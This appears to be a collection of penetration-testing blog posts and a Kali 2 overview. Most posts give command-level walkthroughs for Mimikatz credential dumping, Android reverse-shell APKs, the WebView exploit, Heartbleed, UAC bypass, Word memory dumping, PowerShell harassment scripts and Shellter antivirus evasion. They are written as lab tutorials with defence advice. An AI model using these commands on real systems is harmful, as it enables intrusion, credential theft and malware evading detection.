Recovering Plain Text Passwords with Metasploit and Mimikatz


I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peak at what type of material will be in the book.

Mimikatz, created by our friend Benjamin Delpy (Gentil Kiwi), is a great password recovery tool. It is able to recover passwords from several Windows processes in PLAIN TEXT.

Not too long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote Meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account, and we used the Bypass UAC module to get past UAC and then escalated our access up to SYSTEM level. (Explained in the book) Mimikatz needs that level of access to read credentials out of LSASS.

Now we just need to load in the mimikatz module. There is a 32 and 64 bit module, choose accordingly. For this demo we will be using the 32 bit.

Mimikatz 1

  1. At the Meterpreter prompt, type “load mimikatz”.
  2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

Mimikatz 2

The help is pretty self-explanatory; basically type the corresponding command to the creds that you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt. Or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources – Windows Login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

  1. Type “msv”.

Mimikatz 3

And there you go – a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

  1. Type “kerberos”.

Mimikatz 4

If you look at our user Ralf, you will see his password in plain text!

And that is it, after we get a remote session with Metasploit and using Mimikatz, recovering clear text passwords is just a few commands away.

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)

 


Getting a Remote Shell on an Android Device using Metasploit


Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

Android App

The msfpayload command takes one of the Meterpreter payloads and allows you to create a stand-alone file with it. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port number also if you would like.

Once this is run, a file called “app.apk” will be created:

List File

2. Now just send this file to your Android device; I used a smartphone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It seems to list just about every permission possible, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.1.16 (enter your Kali IP address)
  • set lport 4444

Then just type exploit to start the handler:

exploit1

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see this:

Reverse TCP session

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type “sysinfo” to get information on the device:

sysinfo

9. You can see the processes running by typing, “ps”:

PS command

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android-based commands:

Pretty amazing stuff!

Want to learn a lot more about Kali and Metasploit? Check out “Basic Security Testing with Kali Linux”.


Android Webview Exploit Tutorial (70% of Devices Vulnerable!)


Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit/android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo $PATH” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built-in Browser, and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, the device automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2, which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update); check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version, and it was not vulnerable. Then I remembered that the Android Browser had an update that I downloaded before testing.

I’m not sure whether this will be true for all devices; again, the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.


Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit


You can now quickly detect the OpenSSL-Heartbleed vulnerability on a network using the ever popular nmap command, and with the latest modules from Metasploit you can see the exploit in action.

For this tutorial I will be using a WordPress server and Kali Linux running in two separate VMWare virtual machines.

For a vulnerable server, I used one of Turnkey Linux’s WordPress VMs. There are security updates available for Turnkey’s WordPress, but during the VM setup, and for this tutorial, I purposefully told the VM NOT to install the security updates so I could test for the OpenSSL vulnerability.

Once the WordPress VM was configured (just answer a few simple questions) I then fired up my Kali Linux VM.

Nmap has created a Heartbleed script that does a great job of detecting vulnerable servers. The script may not be available in your version of Kali, so you may have to manually install it.

Detecting Exploit with Nmap

If the OpenSSL-Heartbleed script is not already included in your nmap install, you will need to manually install it.

This is pretty easy, just visit the OpenSSL-Heartbleed nmap Script page, copy and save the nmap nse script file to your nmap “scripts” directory as seen below:

Heartbleed nmap script save

You will also need the nmap “tls.lua” library file, save this to the nmap “nselib” directory as seen below:

Heartbleed nmap tls library

That is it, we can now use the heartbleed script in nmap to detect vulnerable systems.

To use the command the syntax is:

nmap -sV --script=ssl-heartbleed <target>

All we need to plug in is the IP address of our target test WordPress site, 192.168.1.70 in this instance:

heartbleed nmap script command

And if the target machine is vulnerable we will see this:

nmap heartbleed vulnerable detected

State: VULNERABLE
Risk Factor: High
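When you scan more than one host, nmap’s XML output (-oX) is easier to work from than the screen output above. The following Python script is an added example, not part of the original post: it walks the XML, finds each ssl-heartbleed script result and lists the hosts and ports reporting “State: VULNERABLE” so they can be put on a patch list. The sample XML embedded in it is constructed and abbreviated, not real scan output.

```python
"""List hosts that nmap's ssl-heartbleed NSE script flagged as vulnerable.

Produce the input with XML output enabled, e.g.
    nmap -sV --script=ssl-heartbleed -oX heartbleed.xml 192.168.1.0/24
and run this script on heartbleed.xml. Without an argument it parses the
constructed sample document below (not real nmap output).
"""
import re
import sys
import xml.etree.ElementTree as ET

# The NSE vuln library prints "State: VULNERABLE" for a positive finding and
# "State: NOT VULNERABLE" otherwise, so anchor on the exact token sequence.
_VULN_RE = re.compile(r"State:\s+VULNERABLE\b")


def vulnerable_hosts(xml_text):
    """Return [(address, port), ...] for every ssl-heartbleed VULNERABLE result."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")   # fall back to IPv6 / MAC entries
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != "ssl-heartbleed":
                    continue
                if _VULN_RE.search(script.get("output", "")):
                    findings.append((addr, int(port.get("portid"))))
    return findings


# Constructed sample: one unpatched WordPress VM and one patched host.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV --script=ssl-heartbleed -oX heartbleed.xml 192.168.1.70 192.168.1.71">
  <host>
    <address addr="192.168.1.70" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="https" product="Apache httpd"/>
        <script id="ssl-heartbleed" output="
  VULNERABLE:
  The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.
    State: VULNERABLE
    Risk factor: High
"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.168.1.71" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="https" product="nginx"/>
        <script id="ssl-heartbleed" output="
  NOT VULNERABLE:
  The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.
    State: NOT VULNERABLE
"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_XML
    for addr, port in vulnerable_hosts(text):
        print(f"{addr}:{port} vulnerable to Heartbleed - patch OpenSSL, restart the service, then rotate keys and passwords")
```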

Exploiting with Metasploit

Now that we know we have a vulnerable server, we can use the latest Metasploit OpenSSL-Heartbleed module to exploit it. (Note: you can use the module to detect vulnerable systems also)

Update Metasploit to get the latest modules. Just type “msfupdate” at a Kali command prompt:

msfupdate

Now run “msfconsole” to start Metasploit and you will be presented with the Metasploit console:

Metasploit prompt

Next search for the heartbleed modules:

heartbleed search

Notice there are two; we will just be using the scanner.

Type, “use auxiliary/scanner/ssl/openssl_heartbleed”:

heartbleed metasploit module

We are just going to set two options, “set VERBOSE” to true and we need to “set RHOSTS” to our target IP address as seen below:

verbose rhosts

And finally, just “run” the exploit:

heartbleed leaked data

If you click on the picture above, you will see that Metasploit communicated with the server and was able to pull random data from the server’s memory.

The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this. But the danger is in the fact that it could display sensitive data.

Thus the best practice (if you haven’t already) is to check your systems for the Heartbleed vulnerability and patch them immediately. After the systems are patched, change any passwords on the affected machines.

As always, never run security scans or checks on systems that you do not own or have approval to scan.

If you enjoyed this tutorial and want to learn more about Kali Linux and Metasploit, check out my latest book on Amazon, “Basic Security Testing with Kali Linux”.


Bringing Metasploit Exploits to Life with PowerShell


You have a remote shell to a Windows box in Metasploit, very cool, but what can you do? Granted Metasploit is loaded with features, options and tons of post modules (which are all amazing by the way), but what if you want to do something a bit more custom? Say, like adding custom pop-ups and even voice, but you have no clue about programming in Ruby.

How about PowerShell?

Let me start this out by saying I am no programmer. Sure I have futzed around with various languages over the years, and even supervised programmers at a couple jobs – but trust me, I am not a programmer. Secondly, I never would have been able to do this without one of the Metasploit gods – Mubix over at Room362.com. Thanks Mubix!

Talking with a friend about exploit capabilities, we came up with the thought: wouldn’t it be cool if, when a machine was exploited during a red team pentest, it popped up a Windows error message on the screen saying, “Knock, Knock Neo.” You know, from the Matrix movie.

And wouldn’t it be cool if you could get the computer to speak to said victim in a woman’s voice saying the same thing? What if, as long as we are custom creating our Matrix-ish payload, we also wanted to pop up a picture on the target system of the green text filled Matrix screen? I mean wouldn’t that be cool too?

Well, with PowerShell, you can!

If you look at Mubix’s “Powershell Popups + Capture” article, you can see the step-by-step process that we will follow.

Create a text file containing the PowerShell commands; I used something like this:

$shell = New-Object -ComObject "Shell.Application";
$shell.minimizeall();          # clear the desktop by minimizing every open window
Start-Sleep -s 2;              # pause for dramatic effect
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("Knock, knock, Neo." , "Status" , 2);   # 2 = Abort, Retry, Ignore buttons
(New-Object -ComObject SAPI.SPVoice).Speak("Knock, Knock Knee Oh, the Matrix has you!");
c:\test\matrix.jpg;            # opens the image in the default viewer; upload it first with Meterpreter

The first two lines allow the script to clear the user’s screen by minimizing all open windows. We then pause the script for a couple seconds for dramatic effect. The next two lines pop up a Windows (Abort, Retry, Ignore) message box with the movie message, “Knock, Knock Neo.”

Once the user clicks on one of the message box buttons, the script calls the Windows built-in text-to-speech capabilities to audibly speak the same message out of their speakers. Sometimes the words don’t come out exactly like they should, so you need to help the Windows voice API by using slightly different, but similar sounding words (e.g. “Knee Oh” instead of “Neo”).

The final command opens a Matrix .jpg file that we would need to have already uploaded to the system via the Meterpreter upload command. (Pick a big one that fills the screen!)

We need to take the text file and encode it as Mubix’s site shows:

PowerPoint Text to Speech

Then run the following command in our remote shell, adding in the encoded text stream above:

powershell -ep bypass -enc <Paste in the Encoded Text>

And that is it!

Powershell Message Box

One more step that would make this even more creepy (or visually convincing in a red team pentest) would be to use Meterpreter’s built in webcam capability to first snap a picture of the remote user at his computer, upload that picture to their system in place of the matrix.jpg, and then run the command for a more personalized message from “the Matrix”!

The best defense against these types of attacks is to never, ever open or run unexpected files or attachments in e-mails. Never use a USB drive that you find laying around your company. Avoid public Wi-Fi when possible. Finally, always use a script blocking program on your internet browser.


Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit


Iran Thunderstruck

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no-no, so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably land you in jail, so again, don’t do it. Lastly, this is not new; it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbell. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly, we will need a willing Windows 7 system as a target. This attack did not seem to work very well using a VMware virtual machine for a target (the volume-up loop seems to bog systems down pretty good), so I used a stand-alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = "http://www.youtube.com/watch?v=v2AC41dglnM"
#Create hidden IE Com Object
$IEComObject = New-Object -com "InternetExplorer.Application"
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose "Loop will end at $EndTime"
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
    $WscriptObject = New-Object -com wscript.shell
    $WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) in which the Volume Up key (char 175) is sent repeatedly. As mentioned earlier, this loop seems to really draw down the target computer; you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt”.

3. Base64 encode the script:

Iran Thunderstruck 2

Now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

Iran Thunderstruck 3

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Iran Thunderstruck 4

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!


Pulling Remote Word Documents from RAM using Kali Linux


I really enjoyed the article on W00tsec about pulling RAW picture images from memory dumps and thought it would be cool if you could use the same process to pull information from a remote system’s memory using Kali. And you can!

In this tutorial we will see how to pull a Word document from a remote machine’s memory, parse it for text and view it in Kali Linux.

The target system is a Windows 7 PC running Office 2010. We will start with a remote metasploit meterpreter shell session already active. So basically we tricked our test system into running our booby trapped file which created a back door to our Kali system.

So we want to grab the remote memory, but we only want the memory in use by the Word process. Following the w00tsec tutorial we just need to use the SysInternals ProcDump command. ProcDump is available from Microsoft’s Technet site; it is part of the SysInternals Suite. This command allows you to pull memory for specific processes.

You may want to grab the SysInternals “Strings” program too while you are there. “Strings” is a Windows version of the Linux command that we will be using later.

These programs will need to be uploaded to the target system from Meterpreter.

Next, in the Metasploit DOS shell, type “tasklist” to see what is running on the remote Windows system:

tasklist

Further down the list we see that the user has an open session of MS Word (WINWORD.EXE):

processes

Run the procdump command using the “-ma” switch (full memory dump) and the process name “WINWORD.EXE”; lastly, we name the resultant dump file “word”, as seen below:

procdump

We now have a memory dump stored on our remote system called “word.dmp”. The file is pretty large, 362 MB. We could just download that file back to our Kali system, but we can shrink it. We are really only looking for text in the memory dump. We have two options here: we can use the SysInternals “Strings” program to work through the data dump and extract all the text from it (significantly reducing the download size), or we can download the whole file en masse back to our Kali system and use the Linux “strings” command to parse it.

The choice is yours, but I will say with just using the default program settings in both, the Linux one did a much better job of parsing the file.

But basically the command is the same in both versions: “strings word.dmp > word.txt”.

Now if we open the resultant text file in Kali, we see a ton of information – System settings, variables that are set on the system, I even found registry keys mentioned. But eventually we will see this (Produced with the Linux strings command):

Kali Strings Result

Compare that to the Word document we have open on the Windows 7 machine:

Original Document

As you can see the Nmap user manual open on our Windows 7 system has been successfully grabbed from memory remotely, and we can now view the text on our Kali system!

I know there are other forensics programs out there that will do basically the same thing, and this is not a forensically sound way of preserving data needed in a legal case, but it is a lot of fun doing this manually and opens up some interesting possibilities!

The best way to defend against these types of attacks is to follow good security practices against social engineering and phishing type attacks. An attacker would need a remote connection to your system to be able to pull items from your memory. Do not open unknown or unsolicited attachments in e-mails. Be leery of odd sounding links sent to you from a friend’s account, and use a script blocker and a good AV Internet security program when surfing the web.

Want to learn more about Kali Linux and Metasploit? Check out my book, “Basic Security Testing with Kali Linux”.



System level Access and Plain Text Passwords using Bypass UAC and Mimikatz


If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

It’s been a while since I have used Metasploit’s Bypass UAC module, and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit, all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple: the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi”:

BypassUAC Mimikatz 4

Then type, “creds_all”:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!


Anti-Virus Bypass with Shellter 4.0 on Kali Linux


Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adding the shell code to it and then doing a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very painless. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘/usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter: ‘shellter’ from the terminal, or use ‘wineconsole shellter’ from ‘/etc/share/shellter’ if you manually installed.

av bypass shellter 111

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

av bypass shellter 21

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

av bypass shellter 311

Shellter will obfuscate the code and crunch for a while. Then you should see:

Shellter Kali AV 411

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection, copy our evil plink.exe file to the Windows 7 system and run it:

Shellter Kali AV 5

And we have a shell!

Shellter Kali AV 6

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

Shellter Kali AV 7

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

(Post Updated 7/13/15 – Changed command from “wine shellter” to “wineconsole shellter” and updated pictures accordingly.)


Intermediate Security Testing with Kali Linux 2 Released!


Security Series

Introducing my new book, “Intermediate Security Testing with Kali Linux 2”!

The second book in my Kali Linux series has been released. Picking up where “Basic Security Testing with Kali Linux” left off, this book delves deeper into using post exploitation techniques. It also covers Web Application testing using tools like Burp Suite. It then turns to testing smart devices like Android Phones and tablets. And even includes an entire section on using the Forensics tools in Kali to perform computer security testing.

Topics Include:

  • New Metasploit Features and Commands
  • Creating Shells with Msfvenom
  • Post Modules & Railgun
  • PowerShell for Post Exploitation
  • Web Application Pentesting
  • How to use Burp Suite
  • Security Testing Android Devices
  • Forensics Tools for Security Testing
  • Security Testing an Internet of Things (IoT) Device

And much, much more!

This book was originally written for the first version of Kali and was ready to be released last month. But as the new Kali 2.0 was released, I held the book back and completely updated the entire book from beginning to end to cover the new OS and any tool changes. So in essence, although it took about a year and a half to write this book, all the information in it has been updated as of this month!

If you are still using the original Kali, not a problem; the tools work the same in both versions, though I do recommend updating to the new Kali 2.0 as it has a much better interface and menu system. If you are still using Backtrack, please update to Kali 2; you will thank yourself!

The second book dwarfs the first in both size and content. I took to heart all of the feedback from my first book. I had a lot of requests to add more tool coverage, so I added two entire chapters covering included tools and their use. Multiple people asked me to cover the forensics tools, so I added an entire section devoted to security testing with Kali’s Forensics tools. Several people told me that the first book was confusing in places; as I had an extra month to work on this book before publishing, hopefully it will be easier to follow and understand than the first.

I even included a chapter on testing Internet of Things (IoT) devices. As IoT devices are becoming all the rage, security testing them is of high importance. We will have an eye opening look at an actual physical security device in use today that has some serious vulnerabilities.

As always, thank you so much for your support and encouragement. The overwhelming support I have received from individual users, technical trainers, corporations, universities, law enforcement agencies and members of the military has been both humbling and an absolute honor. Thank you!

Intermediate Security Testing with Kali 2 Linux


Kali Linux 2.0 New Desktop Overview


Kali 2.0 Desktop 1

After ten years of evolution, Offensive Security brings us Kali 2.0! Kali 2.0 is by far the easiest to use of all the Backtrack/Kali releases. For those used to the original Kali, the new Kali looks very different. But it is a good thing! The menus have been completely re-organized and streamlined, and many of the tools are represented by helpful icons. Let’s take a few minutes and look at some of the new features of Kali 2.

If you purchased my “Basic Security Testing with Kali Linux” book which was written for the original version of Kali, this overview will help get you acclimated to the new desktop look quickly, all the underlying tools are pretty much the same. My new book, “Intermediate Security Testing with Kali Linux 2” is already written for Kali 2.0.

What’s new in Kali 2?

  • New user interface
  • New Menus and Categories
  • Native Ruby 2.0 for faster Metasploit loading
  • Desktop notifications
  • Built in Screencasting

Kali 2 is much more streamlined and the layout flows very well compared to earlier versions of Kali/ Backtrack. It just feels like everything is at your fingertips and laid out in a very clear and concise manner.

Desktop Overview

The new Desktop looks very good and places everything at your fingertips:

Kali 2.0 Desktop 2

Favorites Bar

The new Kali comes with a customizable “Favorites bar” on the left side of the desktop. This menu lists the most commonly used applications to get you into the action quicker:

Kali 2.0 Desktop 3

Just click on one and the represented tool is automatically started with the required dependencies. For example, clicking on the Metasploit button pre-starts the database software and checks to make sure the default database has been created before launching Metasploit.

Clicking on the “Show Applications” button on the bottom of the favorites bar reveals a lot more applications. The programs are arranged in folders by type:

Kali 2.0 Desktop 4

If you don’t see the app you want, just type in what you are looking for in the search bar.

Applications Menu

A list of common program favorites listed by categories is located under the Applications menu:

Kali 2.0 Desktop 5

The tools are laid out logically by type. For example, just click on the Web Application Analysis menu item to see the most common web app testing tools:

Kali 2.0 Desktop 6

Notice that I didn’t say “all” of the tools for a specific category would be listed. This is because the menu system only shows the top tools and not all of the tools available in Kali. In reality only a fraction of the installed tools in Kali are actually in the menu system. Most of the tools are accessible only from the command line.

Command Line Tools

The majority of tools are installed in the “/usr/share” directory:

Kali 2.0 Desktop 7

These tools (as well as tools listed in the menu) are run simply by typing their name in a terminal. Take a few moments and familiarize yourself with both the menu system and the share directory.

Auto-minimizing windows

Another thing that is new in Kali 2 is that some windows tend to auto-minimize and seem to disappear at times. When a window is minimized you will see a white circle to the left of the associated icon on the favorites bar. In the screenshot below, it is showing that I have two terminal windows minimized:

Kali 2.0 Desktop 8

If I click on the terminal icon once, the first terminal window will appear; click twice and both minimized terminal windows re-appear:

Kali 2.0 Desktop 9

You can also hit “Alt-Tab” to show minimized windows. Keep the “Alt” key pressed and arrow around to see additional windows.

Workspaces

As in the earlier versions of Kali/ Backtrack you also have workspaces. If you are not familiar with workspaces, they are basically additional desktop screens that you can use. Hitting the “Super Key” (Windows Key) gives you an overview of all windows that you have open. If you have a touch screen monitor you can also grab and pull the workspaces menu open. With workspaces you are able to drag and drop running programs between the workspaces:

Kali 2.0 Desktop 10

Places Menu

The Places menu contains links to different locations in Kali:

Kali 2.0 Desktop 11

Screencasting

Kali 2 also has the capability to do screen casting built in. With this you can record your security testing adventures as they happen!

Kali 2.0 Desktop 12

Apache Webserver

At the time of this writing, the Service Icons to stop, start and restart the Apache Web Server seem to have been removed from Kali 2. Not a problem, as you can control it from a terminal prompt by using the following commands:

  • To Start – “service apache2 start” or “/etc/init.d/apache2 start”
  • To Stop – “service apache2 stop” or “/etc/init.d/apache2 stop”
  • To Restart – “service apache2 restart” or “/etc/init.d/apache2 restart”

As seen below:

Kali 2.0 Desktop 13

You can now surf to Kali’s webserver; notice the default webpage has changed from Kali 1:

Kali 2.0 Desktop 14

The web root is also one level deeper now, located in a folder called html:

Kali 2.0 Desktop 15

So when you use the Apache server, just drop your website pages/folders into the “/var/www/html/” directory instead of the old “/var/www/” directory.

Upgrading

Keeping your Kali install up to date is very important. Enter the following commands to update Kali:

  • apt-get update
  • apt-get dist-upgrade
  • reboot

